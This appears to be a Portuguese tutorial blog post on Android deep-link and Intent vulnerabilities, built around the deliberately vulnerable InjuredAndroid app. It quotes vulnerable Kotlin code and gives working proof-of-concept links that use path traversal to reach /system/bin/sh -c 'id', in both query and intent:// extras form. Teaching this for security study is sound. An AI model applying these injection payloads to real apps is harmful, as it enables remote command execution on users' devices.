<!DOCTYPE html>
<html>
<style>

		@font-face { font-family: "gohu"; src: url("/gohu.woff") format('woff'); }
		html {
			background: url('/4rt3/g3n3r4t1v3/sketch_220308a/out.gif') no-repeat center/100% fixed;
		}
		body {
			font-family: 'gohu', monospace;
			max-width: 50em;
			margin: 0 auto;
			color: white;
			line-height: calc(1ex / 0.32);
			margin-top: 3em;
		}
		pre {
			font-family: 'gohu', monospace;
			white-space: pre-wrap;
			line-height: 125%;
      background-color: #111;
      padding: 1em;
		}
		@media only screen and (max-width:768px) {
			body {
				max-width:100%;
			}
		}
		a:link {
			color: #0a0 ;
		}
		a:visited {
			color: #004100 ;
		}
		td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
		span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
		td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
		span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
		.codehilite .hll { background-color: #0000ff }
		.codehilite { background: #000000; }
		.codehilite .c { color: #00ff00 } /* Comment */
		.codehilite .k { color: #ff0000 } /* Keyword */
		.codehilite .ch { color: #00ff00 } /* Comment.Hashbang */
		.codehilite .cm { color: #00ff00 } /* Comment.Multiline */
		.codehilite .cp { color: #e5e5e5 } /* Comment.Preproc */
		.codehilite .cpf { color: #00ff00 } /* Comment.PreprocFile */
		.codehilite .c1 { color: #00ff00 } /* Comment.Single */
		.codehilite .cs { color: #00ff00 } /* Comment.Special */
		.codehilite .kc { color: #ff0000 } /* Keyword.Constant */
		.codehilite .kd { color: #ff0000 } /* Keyword.Declaration */
		.codehilite .kn { color: #ff0000 } /* Keyword.Namespace */
		.codehilite .kp { color: #ff0000 } /* Keyword.Pseudo */
		.codehilite .kr { color: #ff0000 } /* Keyword.Reserved */
		.codehilite .kt { color: #ee82ee } /* Keyword.Type */
		.codehilite .s { color: #87ceeb } /* Literal.String */
		.codehilite .no { color: #7fffd4 } /* Name.Constant */
		.codehilite .nf { color: #ffff00 } /* Name.Function */
		.codehilite .nv { color: #eedd82 } /* Name.Variable */
		.codehilite .sa { color: #87ceeb } /* Literal.String.Affix */
		.codehilite .sb { color: #87ceeb } /* Literal.String.Backtick */
		.codehilite .sc { color: #87ceeb } /* Literal.String.Char */
		.codehilite .dl { color: #87ceeb } /* Literal.String.Delimiter */
		.codehilite .sd { color: #87ceeb } /* Literal.String.Doc */
		.codehilite .s2 { color: #87ceeb } /* Literal.String.Double */
		.codehilite .se { color: #87ceeb } /* Literal.String.Escape */
		.codehilite .sh { color: #87ceeb } /* Literal.String.Heredoc */
		.codehilite .si { color: #87ceeb } /* Literal.String.Interpol */
		.codehilite .sx { color: #87ceeb } /* Literal.String.Other */
		.codehilite .sr { color: #87ceeb } /* Literal.String.Regex */
		.codehilite .s1 { color: #87ceeb } /* Literal.String.Single */
		.codehilite .ss { color: #87ceeb } /* Literal.String.Symbol */
		.codehilite .fm { color: #ffff00 } /* Name.Function.Magic */
		.codehilite .vc { color: #eedd82 } /* Name.Variable.Class */
		.codehilite .vg { color: #eedd82 } /* Name.Variable.Global */
		.codehilite .vi { color: #eedd82 } /* Name.Variable.Instance */
		.codehilite .vm { color: #eedd82 } /* Name.Variable.Magic */
	
</style>
<head>
  <meta charset="UTF-8">
</head>

<body><h1>Pequenas ligações, grandes vulnerabilidades: Uma breve introdução a deep links Android.</h1>
<p>1625694993</p>
<h2>AndroidManifest.xml</h2>
<p>Esse artigo tem como objetivo introduzir as vulnerabilidades que ocorrem no Android por meio do abuso de Intents. Tentarei ser o mais introdutório possível e listarei todas as referências necessárias, caso algum conceito pareça muito avançado. Será utilizado o aplicativo <a href="https://github.com/B3nac/InjuredAndroid">InjuredAndroid</a> como exemplo de <em>apk</em> vulnerável. 541v3 pros companheiros da <a href="https://www.instagram.com/duphouse/">@duphouse</a>, sem eles esse texto não seria possível.</p>
<p>Para mais conteúdos em português, recomendo a <a href="https://www.youtube.com/watch?v=4eso_7RyZ58">série de vídeos</a> do Maycon Vitali sobre Android no geral, assim como <a href="https://www.youtube.com/watch?v=WFUEbMFx2EQ">a minha talk</a> na DupCon com vulnerabilidades reais. Existe também o <a href="https://www.instagram.com/thatmobileproject/">@thatmobileproject</a> para posts sobre segurança em mobile.</p>
<h2>intent://</h2>
<p>Os <a href="https://developer.android.com/guide/components/intents-filters">Intents</a> funcionam como a principal forma dos aplicativos se comunicarem internamente entre si. Por exemplo, se um aplicativo quer abrir o <a href="https://github.com/B3nac/InjuredAndroid">InjuredAndroid</a> ele pode iniciar-lo por meio de um Intent utilizando a <a href="https://en.wikipedia.org/wiki/Uniform_Resource_Identifier">URI</a> <code>flag13://rce</code>.</p>
<pre class="codehilite"><code class="language-java">Intent intent = new Intent();
intent.setData(Uri.parse(&quot;flag13://rce&quot;));
startActivity(intent);
</code></pre>

<p>Além de aceitar todos os elementos de uma <a href="https://en.wikipedia.org/wiki/Uniform_Resource_Identifier">URI</a> ( scheme, host, path, query, fragment ), um Intent também pode levar dados <a href="https://pt.wikipedia.org/wiki/Linguagem_tipada">fortemente tipados</a> por meio dos <a href="https://developer.android.com/reference/android/content/Intent#putExtra(java.lang.String,%20android.os.Bundle)">Intent Extras</a>. Na prática, <em>queries</em> e <em>extras</em> são as formas mais comuns de passar dados entre os aplicativos, eles serão discutidos com exemplos mais adiante.</p>
<h2>&lt; intent-filter &gt;</h2>
<p>Como o Android sabe a qual aplicativo se refere <code>flag13://rce</code>? O InjuredAndroid define um <a href="https://developer.android.com/guide/components/intents-filters#Resolution">Intent Filter</a> que diz quais tipos de Intent o Sistema Operacional deve enviar para ele. O Intent Filter é definido no <a href="https://developer.android.com/guide/topics/manifest/manifest-intro">AndroidManifest.xml</a>.</p>
<p>Vamos analizar a definição do Intent Filter relacionado a <code>flag13://rce</code> : https://github.com/B3nac/InjuredAndroid/blob/master/InjuredAndroid/app/src/main/AndroidManifest.xml</p>
<pre class="codehilite"><code class="language-xml">&lt;activity
    android:name=&quot;.RCEActivity&quot;
    android:label=&quot;@string/title_activity_rce&quot;
    android:theme=&quot;@style/AppTheme.NoActionBar&quot;&gt;
    &lt;intent-filter android:label=&quot;filter_view_flag11&quot;&gt;
        &lt;action android:name=&quot;android.intent.action.VIEW&quot; /&gt;
        &lt;category android:name=&quot;android.intent.category.DEFAULT&quot; /&gt;
        &lt;category android:name=&quot;android.intent.category.BROWSABLE&quot; /&gt;
        &lt;!-- Accepts URIs that begin with &quot;flag13://” --&gt;
        &lt;data
            android:host=&quot;rce&quot;
            android:scheme=&quot;flag13&quot; /&gt;
    &lt;/intent-filter&gt;
&lt;/activity&gt;
</code></pre>

<p>O atributo <code>name</code> define qual <a href="https://developer.android.com/reference/android/app/Activity">Activity</a> será inicializada, como ele começa com ponto, o nome é resolvido para <code>package</code>+<code>.RCEActivity</code> = <code>b3nac.injuredandroid.RCEActivity</code>. Dentro do <code>&lt;intent-filter&gt;</code>, o <code>action</code> se refere ao <a href="https://developer.android.com/reference/android/content/Intent#intent-structure">tipo de ação</a> que será executada, existem uma miríade de tipos de ações que são definidas na classe Intent, porém, na maioria das vezes é utilizado o <code>action</code> padrão <code>android.intent.action.VIEW</code>.</p>
<p><code>category</code> são propriedades extras que definem como o Intent vai se comportar. <code>android.intent.category.DEFAULT</code> define que essa Activity pode ser inicializada mesmo se o Intent não tiver nenhum <code>category</code>. <code>android.intent.category.BROWSABLE</code> dita que a Activity pode ser inicializada pelo browser, isso é super importante pois transforma qualquer ataque em remoto. Digamos que um usuário entre em um site malicioso, esse site consegue inicializar um Intent que abre o App apenas se o Intent Filter tiver a propriedade <code>BROWSABLE</code>.</p>
<p>A <em>tag</em> <a href="https://developer.android.com/guide/topics/manifest/data-element"><code>data</code></a> especifica quais URLs vão corresponder com esse Intent Filter, no nosso caso, o <code>scheme</code> tem que ser <code>flag13</code> e o <code>host</code> igual a <code>rce</code>, ficando <code>flag13://rce</code>. Todas as partes da URI podem ser definidas, como <em>path</em>, <em>port</em>, etc. </p>
<h2>flag13://rce</h2>
<p>Agora que entedemos como Intents e Intents Filters funcionam, vamos procurar alguma vulnerabilidade no <code>flag13://rce</code> (O "rce" ficou meio óbvio né).</p>
<p>O código-fonte da Activity <code>b3nac.injuredandroid.RCEActivity</code> : https://github.com/B3nac/InjuredAndroid/blob/master/InjuredAndroid/app/src/main/java/b3nac/injuredandroid/RCEActivity.kt</p>
<pre class="codehilite"><code class="language-kotlin">49 if (intent != null &amp;&amp; intent.data != null) {
50     copyAssets()
51     val data = intent.data
52     try {
53         val intentParam = data!!.getQueryParameter(&quot;binary&quot;)
54         val binaryParam = data.getQueryParameter(&quot;param&quot;)
55         val combinedParam = data.getQueryParameter(&quot;combined&quot;)
56         if (combinedParam != null) {
57             childRef.addListenerForSingleValueEvent(object : ValueEventListener {
58                 override fun onDataChange(dataSnapshot: DataSnapshot) {
59                     val value = dataSnapshot.value as String?
60                     if (combinedParam == value) {
61                         FlagsOverview.flagThirteenButtonColor = true
62                         val secure = SecureSharedPrefs()
63                         secure.editBoolean(applicationContext, &quot;flagThirteenButtonColor&quot;, true)
64                         correctFlag()
65                     } else {
66                         Toast.makeText(this@RCEActivity, &quot;Try again! :D&quot;,
67                                 Toast.LENGTH_SHORT).show()
68                     }
69                 }
70
71                 override fun onCancelled(databaseError: DatabaseError) {
72                     Log.e(TAG, &quot;onCancelled&quot;, databaseError.toException())
73                 }
74             })
75         }
</code></pre>

<p>A Activity é inicializada na função <code>onCreate</code> e é lá que o Intent será devidamente tratado. Na linha <a href="https://github.com/B3nac/InjuredAndroid/blob/master/InjuredAndroid/app/src/main/java/b3nac/injuredandroid/RCEActivity.kt#L49">49</a> o aplicativo checa se <code>intent</code> é nulo, se não for ele irá pegar algumas <em>queries</em> <code>binary</code>, <code>param</code> e <code>combined</code>. Se <code>combined</code> for nulo ele não entrará no <code>if</code> da linha 56 e irá para o seguinte <code>else</code>:</p>
<pre class="codehilite"><code class="language-kotlin">76 else {
77
78     val process = Runtime.getRuntime().exec(filesDir.parent + &quot;/files/&quot; + intentParam + &quot; &quot; + binaryParam)
79     val bufferedReader = BufferedReader(
80             InputStreamReader(process.inputStream))
81     val log = StringBuilder()
82     bufferedReader.forEachLine {
83         log.append(it)
84     }
85     process.waitFor()
86     val tv = findViewById&lt;TextView&gt;(R.id.RCEView)
87     tv.text = log.toString()
88 }
</code></pre>

<p>Na linha 78 é passado para a função <a href="https://developer.android.com/reference/java/lang/Runtime#exec(java.lang.String[])"><code>Runtime.getRuntime().exec()</code></a> as variáveis <code>intentParam</code> e <code>binaryParam</code>, essa função executa comandos no sistema, logo temos um <a href="https://owasp.org/www-community/attacks/Command_Injection">Command Injection</a> através do Intent. Vamos tentar explora-lo!</p>
<p>Normalmente, num Command Injection tentaríamos passar algum carácter para executar outro commando, como <code>&amp;</code>/<code>|</code>/<code>;</code>, porém se tentarmos desse jeito o Android irá dar um erro na primeira parte do comando, o <code>filesDir.parent + "/files/"</code>, pois não encontrará o arquivo, ou dará erro de permissão e não executará o resto do nosso <em>payload</em>. Para resolvermos esse problema podemos voltar os diretórios com <code>../</code> até chegarmos no diretório <em>root</em>, a partir dai podemos executar o <code>/system/bin/sh</code> e executar qualquer comando que quisermos.</p>
<p>Nossa PoC terá os seguintes passos :</p>
<ol>
<li>Alvo clica num link malicioso</li>
<li>Browser abre um Intent para <code>b3nac.injuredandroid.RCEActivity</code></li>
<li>A Activity <code>RCEActivity</code> executa o comando do atacante</li>
</ol>
<p><code>index.html</code></p>
<pre class="codehilite"><code class="language-html">&lt;a href=&quot;flag13://rce?binary=..%2F..%2F..%2F..%2F..%2Fsystem%2Fbin%2Fsh%20-c%20%27id%27&amp;param=1&quot;&gt;pwn me&lt;/a&gt;
</code></pre>

<p><em>Deixo de tarefa de casa exfiltrar o resultado do comando, ou abrir uma reverse shell no Android</em></p>
<h2>S.Intent_Extras</h2>
<p>Agora digamos que ao invés de receber as variáveis via <em>query</em>, o App as recebesse via Intent Extras, como fazer? Para criar um Intent com Extras apenas usamos a função <a href="https://developer.android.com/reference/android/content/Intent#putExtra(java.lang.String,%20android.os.Parcelable)">putExtra</a>.</p>
<pre class="codehilite"><code class="language-java">Intent intent = new Intent();
intent.setData(Uri.parse(&quot;flag13://rce&quot;));
intent.putExtra(&quot;binary&quot;,&quot;../../../../../system/bin/sh -c 'id'&quot;);
intent.putExtra(&quot;param&quot;,&quot;1&quot;);
startActivity(intent);
</code></pre>

<p>Ok, com isso conseguimos passar Intents Extras por meio de outro App, mas e pelo Browser? Nós podemos utilizar o scheme <a href="https://developer.chrome.com/docs/multidevice/android/intents/"><code>intent://</code></a> para isso! O Intent de cima fica assim :</p>
<pre class="codehilite"><code class="language-html">&lt;a href=&quot;intent://rce/#Intent;scheme=flag13;S.binary=..%2F..%2F..%2F..%2F..%2Fsystem%2Fbin%2Fsh%20-c%20%27id%27;S.param=1;end&quot;&gt;pwn me&lt;/a&gt;
</code></pre>

<p>Primeiro vem o scheme <code>intent://</code>, depois o host <code>rce</code> e logo após a string <code>#Intent</code>, que é obrigatória. A partir dai todas as variáveis são delimitadas por <code>;</code>. Passamos o <code>scheme=flag13</code> e definimos os Extras. O nome do Extra é precedido do tipo dele, como o Extra <code>binary</code> é do tipo String ele é definido com <code>S.binary</code>. Os Extras podem ter vários tipos, como a documentação do scheme <code>intent://</code> é escarsa, o melhor jeito é ler o código fonte do Android que faz o <em>parse</em> dele:  https://cs.android.com/android/platform/superproject/+/master:frameworks/base/core/java/android/content/Intent.java;l=7115;drc=master</p>
<pre class="codehilite"><code class="language-java">if      (uri.startsWith(&quot;S.&quot;, i)) b.putString(key, value);
else if (uri.startsWith(&quot;B.&quot;, i)) b.putBoolean(key, Boolean.parseBoolean(value));
else if (uri.startsWith(&quot;b.&quot;, i)) b.putByte(key, Byte.parseByte(value));
else if (uri.startsWith(&quot;c.&quot;, i)) b.putChar(key, value.charAt(0));
else if (uri.startsWith(&quot;d.&quot;, i)) b.putDouble(key, Double.parseDouble(value));
else if (uri.startsWith(&quot;f.&quot;, i)) b.putFloat(key, Float.parseFloat(value));
else if (uri.startsWith(&quot;i.&quot;, i)) b.putInt(key, Integer.parseInt(value));
else if (uri.startsWith(&quot;l.&quot;, i)) b.putLong(key, Long.parseLong(value));
else if (uri.startsWith(&quot;s.&quot;, i)) b.putShort(key, Short.parseShort(value));
else throw new URISyntaxException(uri, &quot;unknown EXTRA type&quot;, i);
</code></pre>

<p>Por fim só colocar um <code>end</code> (:</p>
<h2>;end</h2>
<p>Podem existir vários tipos de vulnerabilidades oriundas dos Intents, RCE/SQLi/XSS até Buffer Overflow, vai depender só da criatividade do desenvolvedor. Para estudar esse assunto mais a fundo, recomendo a leitura do blog do <a href="https://twitter.com/_bagipro">@bagipro_</a> https://blog.oversecured.com/ e dos reports públicos de Bug Bounty https://github.com/B3nac/Android-Reports-and-Resources . Além do <a href="https://github.com/B3nac/InjuredAndroid">InjuredAndroid</a> também podem brincar com o <a href="https://github.com/oversecured/ovaa">Ovaa</a>. |-|4ck th3 |&gt;l4n3t </p>
<p><a href="twitter.com/caioluders/">@caioluders </a></p></body><hr>by <a href='https://twitter.com/caioluders'>@caioluders</a></html>